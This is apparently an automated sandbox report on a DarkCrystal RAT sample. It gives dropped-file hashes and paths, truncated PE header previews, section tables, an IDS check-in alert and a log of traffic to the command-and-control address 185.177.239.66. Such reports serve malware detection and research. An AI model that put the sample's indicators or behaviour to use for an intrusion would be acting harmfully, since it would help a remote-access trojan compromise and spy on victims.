                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):23552
                                                                                        Entropy (8bit):5.529329139831718
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                        Malicious:true
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                        Malicious:true
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):5.645950918301459
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                        Malicious:true
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):342528
                                                                                        Entropy (8bit):6.170134230759619
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                        Malicious:true
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38912
                                                                                        Entropy (8bit):5.679286635687991
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46592
                                                                                        Entropy (8bit):5.870612048031897
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36352
                                                                                        Entropy (8bit):5.668291349855899
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33792
                                                                                        Entropy (8bit):5.541771649974822
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (831), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):831
                                                                                        Entropy (8bit):5.915788317028199
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:83Rsev5RJ2kkME+fgcyVSDN16nWSS8hwdVkl6Fgeq:URs63kM/f4VSRYWSSEwrO5
                                                                                        MD5:0ED72F0DE762207F49967D0570B0CAA2
                                                                                        SHA1:AF64AC7AF172082A362CB269A8CD30E56F14DFC8
                                                                                        SHA-256:75CD8F2B9FA0C942F02167EA88256F1BF788447BF4AA50BEE88651DA60A09189
                                                                                        SHA-512:237CECEFBB805C8FC21722E00B84943188B3A925E78DC4C6FBE2CB6D0ACA9EF93129D1DA810707BFC964094B8DD7D2DCE426BD1E4D81CEAFF8A7997EA630872A
                                                                                        Malicious:false
                                                                                        Preview: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
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        Process:C:\Windows\System32\PING.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):502
                                                                                        Entropy (8bit):4.613055660879929
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Pr5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:FdUOAokItULVDv
                                                                                        MD5:A5878D417412D799FC6568ECAAF22AE5
                                                                                        SHA1:C230E7B847EB2F031DD62BC7FE3AA9675241B511
                                                                                        SHA-256:ABFFDB8C96B132C0E87D94C48C5E9EE24441A9619D5E5D2C47B463A92ED28451
                                                                                        SHA-512:3842F1D690C0104FDD6C3130E6325B5AACE66FE8E132B6E7568CA0277F7B15B26FD471E33C1618411C2FDC6CD11016067B37F403EC67BCE574DE5E321BFB7B8B
                                                                                        Malicious:false
                                                                                        Preview:..Pinging 813848 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:3XtEci4Mmo.exe
                                                                                        File size:3'823'616 bytes
                                                                                        MD5:529b29e8bcef9cc790f7c61f40d44b39
                                                                                        SHA1:094a6c81f7a116d2099790de3e7cd6449f1bb834
                                                                                        SHA256:a9249873d68391dcdd604b5332c1f3ee1be4303ff5ba8e83147fbab20f87de88
                                                                                        SHA512:240d6de89491acc5229afac34579fe9a1d159d39a9deda72eaaf3ba73c31b45be04e598cbfe31ca38817832e0208adf8f3e5a7a59a56af642a5b602748a431ac
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        TLSH:8E06E1066AA25E73C6A47F35C4D7002E42B1DA36B952EF0B391F71F1AD162308F661B7
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@................................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x7a6fbe
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a6f70 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a8000 | 0x370 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3aa000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x3a4fc4 | 0x3a5000 | 55af96671f9d19020b9582bd7fddbb8e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x3a8000 | 0x370 | 0x400 | 69645f6f796dd2aaaa4073c29bf007ac | False | 0.376953125 | data | 2.8646628107101955 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x3aa000 | 0xc | 0x200 | 64c1f89be3cfc87c2aaf8e47504ca2e1 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x3a8058 | 0x318 | data | | | 0.44823232323232326 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-08T18:08:35.783039+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49955 | 185.177.239.66 | 80 | TCP |
                                                                                        Jan 8, 2025 18:08:45.922132015 CET8050015185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:45.970930099 CET5001580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:46.039402962 CET8050015185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:46.234227896 CET5001580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.401792049 CET5001580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.402194023 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.406936884 CET8050015185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:47.406996012 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:47.407016039 CET5001580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.407104969 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.407368898 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.412108898 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:47.765068054 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:47.770039082 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:47.770051956 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:47.770061970 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.081628084 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.212094069 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.214941025 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.460184097 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.464998007 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.466381073 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.466542959 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.466727018 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.471277952 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.471755981 CET8050016185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.472955942 CET5001680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.812424898 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:48.817245960 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.817259073 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:48.817271948 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.130783081 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.218055964 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.258784056 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.337990999 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.342952013 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.343138933 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.344053984 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.348834991 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.405565023 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.464973927 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.469774961 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.470973015 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.471123934 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.475934029 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.702610970 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.707468987 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.707499981 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.827579021 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:49.832492113 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.832509041 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:49.832576036 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.025100946 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.113590956 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.158041000 CET8050018185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.163832903 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.218050003 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.280576944 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.298451900 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.389035940 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.477324009 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.477411985 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.477756023 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.477838039 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.482486963 CET8050018185.177.239.66192.168.2.4
